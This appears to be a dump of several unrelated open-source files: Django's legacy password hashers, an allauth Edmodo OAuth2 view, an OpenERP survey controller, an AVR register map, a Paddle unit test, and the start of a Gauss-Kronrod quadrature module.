hash = hashlib.sha1(force_bytes(password)).hexdigest()
return 'sha1$$%s' % hash
def verify(self, password, encoded):
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
assert encoded.startswith('sha1$$')
hash = encoded[6:]
return OrderedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class UnsaltedMD5PasswordHasher(BasePasswordHasher):
"""
Incredibly insecure algorithm that you should *never* use; stores unsalted
MD5 hashes without the algorithm prefix, also accepts MD5 hashes with an
empty salt.
This class is implemented because Django used to store passwords this way
and to accept such password hashes. Some older Django installs still have
these values lingering around so we need to handle and upgrade them
properly.
"""
algorithm = "unsalted_md5"
def salt(self):
return ''
def encode(self, password, salt):
assert salt == ''
return hashlib.md5(force_bytes(password)).hexdigest()
def verify(self, password, encoded):
if len(encoded) == 37 and encoded.startswith('md5$$'):
encoded = encoded[5:]
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
return OrderedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(encoded, show=3)),
])
def harden_runtime(self, password, encoded):
pass
class CryptPasswordHasher(BasePasswordHasher):
"""
Password hashing using UNIX crypt (not recommended)
The crypt module is not supported on all platforms.
"""
algorithm = "crypt"
library = "crypt"
def salt(self):
return get_random_string(2)
def encode(self, password, salt):
crypt = self._load_library()
assert len(salt) == 2
data = crypt.crypt(force_str(password), salt)
assert data is not None # A platform like OpenBSD with a dummy crypt module.
# we don't need to store the salt, but Django used to do this
return "%s$%s$%s" % (self.algorithm, '', data)
def verify(self, password, encoded):
crypt = self._load_library()
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return constant_time_compare(data, crypt.crypt(force_str(password), data))
def safe_summary(self, encoded):
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), salt),
(_('hash'), mask_hash(data, show=3)),
])
def harden_runtime(self, password, encoded):
pass
| mit |
beswarm/django-allauth | allauth/socialaccount/providers/edmodo/views.py | 40 | 1075 | import requests
from allauth.socialaccount.providers.oauth2.views import (OAuth2Adapter,
OAuth2LoginView,
OAuth2CallbackView)
from allauth.socialaccount.providers import registry
from .provider import EdmodoProvider
class EdmodoOAuth2Adapter(OAuth2Adapter):
provider_id = EdmodoProvider.id
access_token_url = 'https://api.edmodo.com/oauth/token'
authorize_url = 'https://api.edmodo.com/oauth/authorize'
profile_url = 'https://api.edmodo.com/users/me'
def complete_login(self, request, app, token, **kwargs):
resp = requests.get(self.profile_url,
params={'access_token': token.token})
extra_data = resp.json()
return self.get_provider().sociallogin_from_response(request,
extra_data)
oauth2_login = OAuth2LoginView.adapter_view(EdmodoOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(EdmodoOAuth2Adapter)
| mit |
rvalyi/OpenUpgrade | addons/survey/controllers/main.py | 20 | 19094 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import json
import logging
import werkzeug
from datetime import datetime
from math import ceil
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
from openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT as DTF
from openerp.tools.safe_eval import safe_eval
_logger = logging.getLogger(__name__)
class WebsiteSurvey(http.Controller):
## HELPER METHODS ##
def _check_bad_cases(self, cr, uid, request, survey_obj, survey, user_input_obj, context=None):
# In case of bad survey, redirect to surveys list
if survey_obj.exists(cr, SUPERUSER_ID, survey.id, context=context) == []:
return werkzeug.utils.redirect("/survey/")
# In case of auth required, block public user
if survey.auth_required and uid == request.website.user_id.id:
return request.website.render("website.403")
# In case of non open surveys
if survey.stage_id.closed:
return request.website.render("survey.notopen")
        # If there are no pages
if not survey.page_ids:
return request.website.render("survey.nopages")
# Everything seems to be ok
return None
def _check_deadline(self, cr, uid, user_input, context=None):
        '''Prevent opening of the survey if the deadline has passed.
        ! This will NOT disallow access to users who have already partially filled the survey !'''
if user_input.deadline:
dt_deadline = datetime.strptime(user_input.deadline, DTF)
dt_now = datetime.now()
if dt_now > dt_deadline: # survey is not open anymore
return request.website.render("survey.notopen")
return None
## ROUTES HANDLERS ##
# Survey start
@http.route(['/survey/start/<model("survey.survey"):survey>',
'/survey/start/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def start_survey(self, survey, token=None, **post):
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
user_input_obj = request.registry['survey.user_input']
# Test mode
if token and token == "phantom":
_logger.info("[survey] Phantom mode")
user_input_id = user_input_obj.create(cr, uid, {'survey_id': survey.id, 'test_entry': True}, context=context)
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
data = {'survey': survey, 'page': None, 'token': user_input.token}
return request.website.render('survey.survey_init', data)
# END Test mode
# Controls if the survey can be displayed
errpage = self._check_bad_cases(cr, uid, request, survey_obj, survey, user_input_obj, context=context)
if errpage:
return errpage
# Manual surveying
if not token:
user_input_id = user_input_obj.create(cr, uid, {'survey_id': survey.id}, context=context)
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
else:
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', token)], context=context)[0]
except IndexError: # Invalid token
return request.website.render("website.403")
else:
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
# Do not open expired survey
errpage = self._check_deadline(cr, uid, user_input, context=context)
if errpage:
return errpage
# Select the right page
if user_input.state == 'new': # Intro page
data = {'survey': survey, 'page': None, 'token': user_input.token}
return request.website.render('survey.survey_init', data)
else:
return request.redirect('/survey/fill/%s/%s' % (survey.id, user_input.token))
# Survey displaying
@http.route(['/survey/fill/<model("survey.survey"):survey>/<string:token>',
'/survey/fill/<model("survey.survey"):survey>/<string:token>/<string:prev>'],
type='http', auth='public', website=True)
def fill_survey(self, survey, token, prev=None, **post):
'''Display and validates a survey'''
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
user_input_obj = request.registry['survey.user_input']
# Controls if the survey can be displayed
errpage = self._check_bad_cases(cr, uid, request, survey_obj, survey, user_input_obj, context=context)
if errpage:
return errpage
# Load the user_input
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', token)])[0]
except IndexError: # Invalid token
return request.website.render("website.403")
else:
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
# Do not display expired survey (even if some pages have already been
# displayed -- There's a time for everything!)
errpage = self._check_deadline(cr, uid, user_input, context=context)
if errpage:
return errpage
# Select the right page
if user_input.state == 'new': # First page
page, page_nr, last = survey_obj.next_page(cr, uid, user_input, 0, go_back=False, context=context)
data = {'survey': survey, 'page': page, 'page_nr': page_nr, 'token': user_input.token}
if last:
data.update({'last': True})
return request.website.render('survey.survey', data)
elif user_input.state == 'done': # Display success message
return request.website.render('survey.sfinished', {'survey': survey,
'token': token,
'user_input': user_input})
elif user_input.state == 'skip':
flag = (True if prev and prev == 'prev' else False)
page, page_nr, last = survey_obj.next_page(cr, uid, user_input, user_input.last_displayed_page_id.id, go_back=flag, context=context)
data = {'survey': survey, 'page': page, 'page_nr': page_nr, 'token': user_input.token}
if last:
data.update({'last': True})
return request.website.render('survey.survey', data)
else:
return request.website.render("website.403")
# AJAX prefilling of a survey
@http.route(['/survey/prefill/<model("survey.survey"):survey>/<string:token>',
'/survey/prefill/<model("survey.survey"):survey>/<string:token>/<model("survey.page"):page>'],
type='http', auth='public', website=True)
def prefill(self, survey, token, page=None, **post):
cr, uid, context = request.cr, request.uid, request.context
user_input_line_obj = request.registry['survey.user_input_line']
ret = {}
# Fetch previous answers
if page:
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token), ('page_id', '=', page.id)], context=context)
else:
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token)], context=context)
previous_answers = user_input_line_obj.browse(cr, uid, ids, context=context)
# Return non empty answers in a JSON compatible format
for answer in previous_answers:
if not answer.skipped:
answer_tag = '%s_%s_%s' % (answer.survey_id.id, answer.page_id.id, answer.question_id.id)
answer_value = None
if answer.answer_type == 'free_text':
answer_value = answer.value_free_text
elif answer.answer_type == 'text' and answer.question_id.type == 'textbox':
answer_value = answer.value_text
elif answer.answer_type == 'text' and answer.question_id.type != 'textbox':
# here come comment answers for matrices, simple choice and multiple choice
answer_tag = "%s_%s" % (answer_tag, 'comment')
answer_value = answer.value_text
elif answer.answer_type == 'number':
                    answer_value = str(answer.value_number)
elif answer.answer_type == 'date':
answer_value = answer.value_date
elif answer.answer_type == 'suggestion' and not answer.value_suggested_row:
answer_value = answer.value_suggested.id
elif answer.answer_type == 'suggestion' and answer.value_suggested_row:
answer_tag = "%s_%s" % (answer_tag, answer.value_suggested_row.id)
answer_value = answer.value_suggested.id
if answer_value:
dict_soft_update(ret, answer_tag, answer_value)
else:
_logger.warning("[survey] No answer has been found for question %s marked as non skipped" % answer_tag)
return json.dumps(ret)
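    # Illustrative sketch: the returned JSON maps answer tags to value lists,
    # e.g. {"1_2_5": ["42"], "1_2_6_comment": ["free text"]}, where a tag is
    # "<survey_id>_<page_id>_<question_id>" with an optional suffix for
    # comments or matrix rows, as built above.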
# AJAX scores loading for quiz correction mode
@http.route(['/survey/scores/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def get_scores(self, survey, token, page=None, **post):
cr, uid, context = request.cr, request.uid, request.context
user_input_line_obj = request.registry['survey.user_input_line']
ret = {}
# Fetch answers
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token)], context=context)
previous_answers = user_input_line_obj.browse(cr, uid, ids, context=context)
# Compute score for each question
for answer in previous_answers:
tmp_score = ret.get(answer.question_id.id, 0.0)
ret.update({answer.question_id.id: tmp_score + answer.quizz_mark})
return json.dumps(ret)
# AJAX submission of a page
@http.route(['/survey/submit/<model("survey.survey"):survey>'],
type='http', methods=['POST'], auth='public', website=True)
def submit(self, survey, **post):
_logger.debug('Incoming data: %s', post)
page_id = int(post['page_id'])
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
questions_obj = request.registry['survey.question']
questions_ids = questions_obj.search(cr, uid, [('page_id', '=', page_id)], context=context)
questions = questions_obj.browse(cr, uid, questions_ids, context=context)
# Answer validation
errors = {}
for question in questions:
answer_tag = "%s_%s_%s" % (survey.id, page_id, question.id)
errors.update(questions_obj.validate_question(cr, uid, question, post, answer_tag, context=context))
ret = {}
        if errors:
            # Return error messages to the webpage
            ret['errors'] = errors
else:
# Store answers into database
user_input_obj = request.registry['survey.user_input']
user_input_line_obj = request.registry['survey.user_input_line']
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', post['token'])], context=context)[0]
            except (KeyError, IndexError):  # Missing or invalid token
return request.website.render("website.403")
for question in questions:
answer_tag = "%s_%s_%s" % (survey.id, page_id, question.id)
user_input_line_obj.save_lines(cr, uid, user_input_id, question, post, answer_tag, context=context)
user_input = user_input_obj.browse(cr, uid, user_input_id, context=context)
go_back = post['button_submit'] == 'previous'
next_page, _, last = survey_obj.next_page(cr, uid, user_input, page_id, go_back=go_back, context=context)
vals = {'last_displayed_page_id': page_id}
if next_page is None and not go_back:
vals.update({'state': 'done'})
else:
vals.update({'state': 'skip'})
user_input_obj.write(cr, uid, user_input_id, vals, context=context)
ret['redirect'] = '/survey/fill/%s/%s' % (survey.id, post['token'])
if go_back:
ret['redirect'] += '/prev'
return json.dumps(ret)
# Printing routes
@http.route(['/survey/print/<model("survey.survey"):survey>',
'/survey/print/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def print_survey(self, survey, token=None, **post):
        '''Display a survey in printable view; if <token> is set, it will
grab the answers of the user_input_id that has <token>.'''
return request.website.render('survey.survey_print',
{'survey': survey,
'token': token,
'page_nr': 0,
'quizz_correction': True if survey.quizz_mode and token else False})
@http.route(['/survey/results/<model("survey.survey"):survey>'],
type='http', auth='user', website=True)
def survey_reporting(self, survey, token=None, **post):
'''Display survey Results & Statistics for given survey.'''
result_template, current_filters, filter_display_data, filter_finish = 'survey.result', [], [], False
survey_obj = request.registry['survey.survey']
if not survey.user_input_ids or not [input_id.id for input_id in survey.user_input_ids if input_id.state != 'new']:
result_template = 'survey.no_result'
if 'finished' in post:
post.pop('finished')
filter_finish = True
if post or filter_finish:
filter_data = self.get_filter_data(post)
current_filters = survey_obj.filter_input_ids(request.cr, request.uid, filter_data, filter_finish, context=request.context)
filter_display_data = survey_obj.get_filter_display_data(request.cr, request.uid, filter_data, context=request.context)
return request.website.render(result_template,
{'survey': survey,
'survey_dict': self.prepare_result_dict(survey, current_filters),
'page_range': self.page_range,
'current_filters': current_filters,
'filter_display_data': filter_display_data,
'filter_finish': filter_finish
})
    def prepare_result_dict(self, survey, current_filters=[]):
        """Returns dictionary having values for rendering template"""
        survey_obj = request.registry['survey.survey']
        result = {'survey': survey, 'page_ids': []}
        for page in survey.page_ids:
            page_dict = {'page': page, 'question_ids': []}
            for question in page.question_ids:
                question_dict = {
                    'question': question,
                    'input_summary': survey_obj.get_input_summary(request.cr, request.uid, question, current_filters, context=request.context),
                    'prepare_result': survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context),
                    'graph_data': self.get_graph_data(question, current_filters),
                }
                page_dict['question_ids'].append(question_dict)
            result['page_ids'].append(page_dict)
        return result
def get_filter_data(self, post):
"""Returns data used for filtering the result"""
filters = []
for ids in post:
            #if the user adds random data to the query URI, ignore it
            try:
                row_id, answer_id = ids.split(',')
                filters.append({'row_id': int(row_id), 'answer_id': int(answer_id)})
            except ValueError:
return filters
return filters
def page_range(self, total_record, limit):
'''Returns number of pages required for pagination'''
total = ceil(total_record / float(limit))
return range(1, int(total + 1))
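    # Illustrative sketch: page_range(45, 20) gives ceil(45 / 20.0) = 3 pages,
    # i.e. range(1, 4) -> [1, 2, 3].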
def get_graph_data(self, question, current_filters=[]):
'''Returns formatted data required by graph library on basis of filter'''
survey_obj = request.registry['survey.survey']
result = []
if question.type == 'multiple_choice':
result.append({'key': str(question.question),
'values': survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)})
if question.type == 'simple_choice':
result = survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)
if question.type == 'matrix':
data = survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)
for answer in data['answers']:
values = []
for res in data['result']:
if res[1] == answer:
values.append({'text': data['rows'][res[0]], 'count': data['result'][res]})
result.append({'key': data['answers'].get(answer), 'values': values})
return json.dumps(result)
def dict_soft_update(dictionary, key, value):
''' Insert the pair <key>: <value> into the <dictionary>. If <key> is
already present, this function will append <value> to the list of
existing data (instead of erasing it) '''
if key in dictionary:
dictionary[key].append(value)
else:
dictionary.update({key: [value]})
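# Illustrative sketch: values accumulate per key instead of overwriting.
#     d = {}
#     dict_soft_update(d, 'a', 1)
#     dict_soft_update(d, 'a', 2)
#     # d == {'a': [1, 2]}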
| agpl-3.0 |
andrewtholt/My-amforth-6.1 | avr8/devices/atmega6490p/device.py | 5 | 6779 | # Partname: ATmega6490P
# generated automatically, do not edit
MCUREGS = {
'ADMUX': '&124',
'ADMUX_REFS': '$C0',
'ADMUX_ADLAR': '$20',
'ADMUX_MUX': '$1F',
'ADCSRA': '&122',
'ADCSRA_ADEN': '$80',
'ADCSRA_ADSC': '$40',
'ADCSRA_ADATE': '$20',
'ADCSRA_ADIF': '$10',
'ADCSRA_ADIE': '$08',
'ADCSRA_ADPS': '$07',
'ADC': '&120',
'ADCSRB': '&123',
'ADCSRB_ADTS': '$07',
'DIDR0': '&126',
'DIDR0_ADC7D': '$80',
'DIDR0_ADC6D': '$40',
'DIDR0_ADC5D': '$20',
'DIDR0_ADC4D': '$10',
'DIDR0_ADC3D': '$08',
'DIDR0_ADC2D': '$04',
'DIDR0_ADC1D': '$02',
'DIDR0_ADC0D': '$01',
'ACSR': '&80',
'ACSR_ACD': '$80',
'ACSR_ACBG': '$40',
'ACSR_ACO': '$20',
'ACSR_ACI': '$10',
'ACSR_ACIE': '$08',
'ACSR_ACIC': '$04',
'ACSR_ACIS': '$03',
'DIDR1': '&127',
'DIDR1_AIN1D': '$02',
'DIDR1_AIN0D': '$01',
'SPCR': '&76',
'SPCR_SPIE': '$80',
'SPCR_SPE': '$40',
'SPCR_DORD': '$20',
'SPCR_MSTR': '$10',
'SPCR_CPOL': '$08',
'SPCR_CPHA': '$04',
'SPCR_SPR': '$03',
'SPSR': '&77',
'SPSR_SPIF': '$80',
'SPSR_WCOL': '$40',
'SPSR_SPI2X': '$01',
'SPDR': '&78',
'USIDR': '&186',
'USISR': '&185',
'USISR_USISIF': '$80',
'USISR_USIOIF': '$40',
'USISR_USIPF': '$20',
'USISR_USIDC': '$10',
'USISR_USICNT': '$0F',
'USICR': '&184',
'USICR_USISIE': '$80',
'USICR_USIOIE': '$40',
'USICR_USIWM': '$30',
'USICR_USICS': '$0C',
'USICR_USICLK': '$02',
'USICR_USITC': '$01',
'UDR0': '&198',
'UCSR0A': '&192',
'UCSR0A_RXC0': '$80',
'UCSR0A_TXC0': '$40',
'UCSR0A_UDRE0': '$20',
'UCSR0A_FE0': '$10',
'UCSR0A_DOR0': '$08',
'UCSR0A_UPE0': '$04',
'UCSR0A_U2X0': '$02',
'UCSR0A_MPCM0': '$01',
'UCSR0B': '&193',
'UCSR0B_RXCIE0': '$80',
'UCSR0B_TXCIE0': '$40',
'UCSR0B_UDRIE0': '$20',
'UCSR0B_RXEN0': '$10',
'UCSR0B_TXEN0': '$08',
'UCSR0B_UCSZ02': '$04',
'UCSR0B_RXB80': '$02',
'UCSR0B_TXB80': '$01',
'UCSR0C': '&194',
'UCSR0C_UMSEL0': '$40',
'UCSR0C_UPM0': '$30',
'UCSR0C_USBS0': '$08',
'UCSR0C_UCSZ0': '$06',
'UCSR0C_UCPOL0': '$01',
'UBRR0': '&196',
'SREG': '&95',
'SREG_I': '$80',
'SREG_T': '$40',
'SREG_H': '$20',
'SREG_S': '$10',
'SREG_V': '$08',
'SREG_N': '$04',
'SREG_Z': '$02',
'SREG_C': '$01',
'SP': '&93',
'MCUCR': '&85',
'MCUCR_PUD': '$10',
'MCUCR_IVSEL': '$02',
'MCUCR_IVCE': '$01',
'MCUSR': '&84',
'MCUSR_JTRF': '$10',
'MCUSR_WDRF': '$08',
'MCUSR_BORF': '$04',
'MCUSR_EXTRF': '$02',
'MCUSR_PORF': '$01',
'OSCCAL': '&102',
'CLKPR': '&97',
'CLKPR_CLKPCE': '$80',
'CLKPR_CLKPS': '$0F',
'PRR': '&100',
'PRR_PRLCD': '$10',
'PRR_PRTIM1': '$08',
'PRR_PRSPI': '$04',
'PRR_PRUSART0': '$02',
'PRR_PRADC': '$01',
'SMCR': '&83',
'SMCR_SM': '$0E',
'SMCR_SE': '$01',
'GPIOR2': '&75',
'GPIOR1': '&74',
'GPIOR0': '&62',
'OCDR': '&81',
'EEAR': '&65',
'EEDR': '&64',
'EECR': '&63',
'EECR_EERIE': '$08',
'EECR_EEMWE': '$04',
'EECR_EEWE': '$02',
'EECR_EERE': '$01',
'PORTA': '&34',
'DDRA': '&33',
'PINA': '&32',
'PORTB': '&37',
'DDRB': '&36',
'PINB': '&35',
'PORTC': '&40',
'DDRC': '&39',
'PINC': '&38',
'PORTD': '&43',
'DDRD': '&42',
'PIND': '&41',
'PORTE': '&46',
'DDRE': '&45',
'PINE': '&44',
'PORTF': '&49',
'DDRF': '&48',
'PINF': '&47',
'PORTG': '&52',
'DDRG': '&51',
'PING': '&50',
'TCCR0A': '&68',
'TCCR0A_FOC0A': '$80',
'TCCR0A_WGM00': '$40',
'TCCR0A_COM0A': '$30',
'TCCR0A_WGM01': '$08',
'TCCR0A_CS0': '$07',
'TCNT0': '&70',
'OCR0A': '&71',
'TIMSK0': '&110',
'TIMSK0_OCIE0A': '$02',
'TIMSK0_TOIE0': '$01',
'TIFR0': '&53',
'TIFR0_OCF0A': '$02',
'TIFR0_TOV0': '$01',
'GTCCR': '&67',
'GTCCR_TSM': '$80',
'GTCCR_PSR310': '$01',
'TCCR1A': '&128',
'TCCR1A_COM1A': '$C0',
'TCCR1A_COM1B': '$30',
'TCCR1A_WGM1': '$03',
'TCCR1B': '&129',
'TCCR1B_ICNC1': '$80',
'TCCR1B_ICES1': '$40',
'TCCR1B_WGM1': '$18',
'TCCR1B_CS1': '$07',
'TCCR1C': '&130',
'TCCR1C_FOC1A': '$80',
'TCCR1C_FOC1B': '$40',
'TCNT1': '&132',
'OCR1A': '&136',
'OCR1B': '&138',
'ICR1': '&134',
'TIMSK1': '&111',
'TIMSK1_ICIE1': '$20',
'TIMSK1_OCIE1B': '$04',
'TIMSK1_OCIE1A': '$02',
'TIMSK1_TOIE1': '$01',
'TIFR1': '&54',
'TIFR1_ICF1': '$20',
'TIFR1_OCF1B': '$04',
'TIFR1_OCF1A': '$02',
'TIFR1_TOV1': '$01',
'TCCR2A': '&176',
'TCCR2A_FOC2A': '$80',
'TCCR2A_WGM20': '$40',
'TCCR2A_COM2A': '$30',
'TCCR2A_WGM21': '$08',
'TCCR2A_CS2': '$07',
'TCNT2': '&178',
'OCR2A': '&179',
'TIMSK2': '&112',
'TIMSK2_OCIE2A': '$02',
'TIMSK2_TOIE2': '$01',
'TIFR2': '&55',
'TIFR2_OCF2A': '$02',
'TIFR2_TOV2': '$01',
'ASSR': '&182',
'ASSR_EXCLK': '$10',
'ASSR_AS2': '$08',
'ASSR_TCN2UB': '$04',
'ASSR_OCR2UB': '$02',
'ASSR_TCR2UB': '$01',
'WDTCR': '&96',
'WDTCR_WDCE': '$10',
'WDTCR_WDE': '$08',
'WDTCR_WDP': '$07',
'SPMCSR': '&87',
'SPMCSR_SPMIE': '$80',
'SPMCSR_RWWSB': '$40',
'SPMCSR_RWWSRE': '$10',
'SPMCSR_BLBSET': '$08',
'SPMCSR_PGWRT': '$04',
'SPMCSR_PGERS': '$02',
'SPMCSR_SPMEN': '$01',
'PORTH': '&218',
'DDRH': '&217',
'PINH': '&216',
'PORTJ': '&221',
'DDRJ': '&220',
'PINJ': '&219',
'LCDDR19': '&255',
'LCDDR18': '&254',
'LCDDR17': '&253',
'LCDDR16': '&252',
'LCDDR15': '&251',
'LCDDR14': '&250',
'LCDDR13': '&249',
'LCDDR12': '&248',
'LCDDR11': '&247',
'LCDDR10': '&246',
'LCDDR9': '&245',
'LCDDR8': '&244',
'LCDDR7': '&243',
'LCDDR6': '&242',
'LCDDR5': '&241',
'LCDDR4': '&240',
'LCDDR3': '&239',
'LCDDR2': '&238',
'LCDDR1': '&237',
'LCDDR0': '&236',
'LCDCCR': '&231',
'LCDFRR': '&230',
'LCDFRR_LCDPS': '$70',
'LCDFRR_LCDCD': '$07',
'LCDCRB': '&229',
'LCDCRB_LCDCS': '$80',
'LCDCRB_LCD2B': '$40',
'LCDCRB_LCDMUX': '$30',
'LCDCRB_LCDPM': '$0F',
'LCDCRA': '&228',
'LCDCRA_LCDEN': '$80',
'LCDCRA_LCDAB': '$40',
'LCDCRA_LCDIF': '$10',
'LCDCRA_LCDIE': '$08',
'LCDCRA_LCDBL': '$01',
'EICRA': '&105',
'EICRA_ISC01': '$02',
'EICRA_ISC00': '$01',
'EIMSK': '&61',
'EIMSK_PCIE': '$F0',
'EIMSK_INT0': '$01',
'EIFR': '&60',
'EIFR_PCIF': '$F0',
'EIFR_INTF0': '$01',
'PCMSK3': '&115',
'PCMSK2': '&109',
'PCMSK1': '&108',
'PCMSK0': '&107',
'INT0Addr': '2',
'PCINT0Addr': '4',
'PCINT1Addr': '6',
'TIMER2_COMPAddr': '8',
'TIMER2_OVFAddr': '10',
'TIMER1_CAPTAddr': '12',
'TIMER1_COMPAAddr': '14',
'TIMER1_COMPBAddr': '16',
'TIMER1_OVFAddr': '18',
'TIMER0_COMPAddr': '20',
'TIMER0_OVFAddr': '22',
'SPI__STCAddr': '24',
'USART__RXAddr': '26',
'USART__UDREAddr': '28',
'USART0__TXAddr': '30',
'USI_STARTAddr': '32',
'USI_OVERFLOWAddr': '34',
'ANALOG_COMPAddr': '36',
'ADCAddr': '38',
'EE_READYAddr': '40',
'SPM_READYAddr': '42',
'LCDAddr': '44',
'PCINT2Addr': '46',
'PCINT3Addr': '48'
} | gpl-3.0 |
baidu/Paddle | python/paddle/fluid/tests/unittests/test_ir_memory_optimize_nlp.py | 5 | 1878 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# NLP models stack ops that operate on LoD tensors; this is a classical test case for the memory-optimize pass.
from __future__ import print_function
import paddle.fluid as fluid
import unittest
from ir_memory_optimize_net_base import TestIrMemOptBase
def lstm_net(data,
label,
dict_dim,
emb_dim=128,
hid_dim=128,
hid_dim2=96,
class_dim=2,
emb_lr=30.0):
emb = fluid.layers.embedding(
input=data,
size=[dict_dim, emb_dim],
param_attr=fluid.ParamAttr(learning_rate=emb_lr))
fc0 = fluid.layers.fc(input=emb, size=hid_dim * 4)
lstm_h, c = fluid.layers.dynamic_lstm(
input=fc0, size=hid_dim * 4, is_reverse=False)
lstm_max = fluid.layers.sequence_pool(input=lstm_h, pool_type='max')
lstm_max_tanh = fluid.layers.tanh(lstm_max)
fc1 = fluid.layers.fc(input=lstm_max_tanh, size=hid_dim2, act='tanh')
prediction = fluid.layers.fc(input=fc1, size=class_dim, act='softmax')
cost = fluid.layers.cross_entropy(input=prediction, label=label)
avg_cost = fluid.layers.mean(x=cost)
return avg_cost
class TestIrMemOptRNN(TestIrMemOptBase):
def setUp(self):
self.network = lstm_net
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
rtrwalker/geotecha | geotecha/mathematics/quadrature.py | 1 | 74253 | # geotecha - A software suite for geotechncial engineering
# Copyright (C) 2018 Rohan T. Walker ([email protected])
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/gpl.html.
"""Numerical integration by quadrature"""
from __future__ import division, print_function
import matplotlib.pyplot
import numpy as np
from scipy import integrate
from scipy.special import jn_zeros
from scipy.special import jn
from matplotlib import pyplot as plt
import functools
import unittest
from numpy.testing import assert_allclose
from numpy.polynomial.polynomial import Polynomial
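# Illustrative usage sketch (not part of the original module): the paired
# weight vectors returned below let a single set of function evaluations
# produce both a Gauss estimate and a finer Kronrod estimate, whose
# difference serves as a heuristic error indicator. `_gauss_kronrod_demo`
# is a hypothetical helper name.
def _gauss_kronrod_demo():
    xi, wi1, wi2 = gauss_kronrod_abscissae_and_weights(15)
    fx = np.cos(xi)
    coarse = np.sum(fx * wi1)  # 15-point Gauss estimate of the integral on [-1, 1]
    fine = np.sum(fx * wi2)    # 31-point Kronrod estimate (exact value ~ 2*sin(1))
    return fine, abs(fine - coarse)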
def gauss_kronrod_abscissae_and_weights(n):
"""Gauss-Kronrod quadrature abscissae and weights
Coarse integral = Sum(f(xi) * wi1)
Fine integral = Sum(f(xi) * wi2)
For the coarse integral the unused weights are set to zero
Parameters
----------
    n : [7, 10, 15, 20, 25, 30]
number of integration points for the Gauss points. Number of Kronrod
points will automatically be 2 * n + 1.
Returns
-------
xi : 1d array
Abscissae for the quadrature points.
wi1 : 1d array
Weights for the coarse integral.
wi2 : 1d array
Weights for the fine integral
References
----------
    .. [1] Holoborodko, Pavel. 2011. 'Gauss-Kronrod Quadrature Nodes and
           Weights.' November 7.
           http://www.advanpix.com/2011/11/07/gauss-kronrod-quadrature-nodes-weights/#Tabulated_Gauss-Kronrod_weights_and_abscissae
"""
    if n not in [7, 10, 15, 20, 25, 30]:
        raise ValueError('n must be one of 7, 10, 15, 20, 25, or 30')
weights = {
7: {
'g': np.array(
[[-0.9491079123427585245261897, 0.1294849661688696932706114],
[ -0.7415311855993944398638648, 0.2797053914892766679014678],
[ -0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.0000000000000000000000000, 0.4179591836734693877551020],
[ 0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.7415311855993944398638648, 0.2797053914892766679014678],
[ 0.9491079123427585245261897, 0.1294849661688696932706114]],
dtype=float),
'k': np.array(
[[-0.9914553711208126392068547, 0.0229353220105292249637320],
[ -0.9491079123427585245261897, 0.0630920926299785532907007],
[ -0.8648644233597690727897128, 0.1047900103222501838398763],
[ -0.7415311855993944398638648, 0.1406532597155259187451896],
[ -0.5860872354676911302941448, 0.1690047266392679028265834],
